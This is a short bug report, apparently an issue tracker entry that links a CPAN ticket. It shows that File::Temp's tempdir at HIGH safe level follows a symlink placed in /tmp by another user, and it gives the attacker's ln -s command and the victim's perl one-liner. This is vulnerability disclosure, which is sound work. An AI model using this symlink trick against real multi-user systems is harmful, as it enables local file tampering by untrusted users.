Open
Description
https://rt.cpan.org/Ticket/Display.html?id=69106
Example...
As user "attacker":
ln -s /tmp /tmp/exploit
As user "victim":
perl -MFile::Temp -e 'File::Temp->safe_level(File::Temp::HIGH); print
File::Temp::tempdir("/tmp/exploit/meXXXX") . "\n";'
The temporary directory path that is returned includes the symlink owned
by the "attacker" user.
Metadata
Metadata
Assignees
Labels
No labels